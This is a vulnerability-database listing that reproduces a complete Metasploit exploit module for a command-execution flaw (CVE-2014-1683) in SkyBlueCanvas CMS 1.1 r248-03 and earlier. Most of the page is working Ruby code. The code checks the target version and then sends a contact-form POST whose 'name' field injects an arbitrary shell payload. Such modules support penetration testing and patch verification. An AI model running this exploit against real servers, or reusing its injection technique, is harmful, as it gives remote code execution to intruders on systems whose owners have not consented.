SkyBlueCanvas CMS Remote Code Execution

2014-01-31T15:18:59
ID MSF:EXPLOIT/UNIX/WEBAPP/SKYBLUECANVAS_EXEC
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module exploits an arbitrary command execution vulnerability in SkyBlueCanvas CMS version 1.1 r248-03 and below.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'SkyBlueCanvas CMS Remote Code Execution',
      'Description'    => %q{
        This module exploits an arbitrary command execution vulnerability
        in SkyBlueCanvas CMS version 1.1 r248-03 and below.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Scott Parish', # Vulnerability discovery and exploit
          'xistence <xistence[at]0x90.nl>' # Metasploit Module
        ],
      'References'     =>
        [
          ['CVE', '2014-1683'],
          ['OSVDB', '102586'],
          ['BID', '65129'],
          ['EDB', '31183'],
          ['PACKETSTORM', '124948']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          # Arbitrary big number. The payload gets sent as an HTTP
          # response body, so really it's unlimited
          'Space'       => 262144, # 256k
          'DisableNops' => true,
          'Compat' =>
            {
              'ConnectionType' => 'find',
              'PayloadType'    => 'cmd',
              'RequiredCmd'    => 'generic perl ruby telnet python'
            }
        },
      'Platform'       => %w{ unix },
      'Targets'        =>
        [
          ['SkyBlueCanvas 1.1 r248', {}]
        ],
      'Arch'           => ARCH_CMD,
      'DisclosureDate' => 'Jan 28 2014',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI',[true, "The path to the SkyBlueCanvas CMS installation", "/"]),
      ])
  end

  def check
    uri = normalize_uri(target_uri.path.to_s, "index.php")

    res = send_request_raw('uri' => uri)

    if res && res.body.include?('SkyBlueCanvas [1.1 r248]')
      vprint_good("SkyBlueCanvas CMS 1.1 r248-xx found")
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    uri = normalize_uri(target_uri.path.to_s, "index.php")

    vprint_status("Sending request to #{uri}.")

    send_request_cgi({
      'method'  => 'POST',
      'uri'     => uri,
      'vars_get' => { 'pid' => '4' },
      'vars_post' =>
        {
          'cid' => '3',
          'name' => "#{rand_text_alphanumeric(10)}\";#{payload.encoded};",
          'email' => rand_text_alphanumeric(10),
          'subject' => rand_text_alphanumeric(10),
          'message' => rand_text_alphanumeric(10),
          'action' => 'Send',
          'mailinglist' => '0',
          'cc' => '0'
        }
    })
  end
end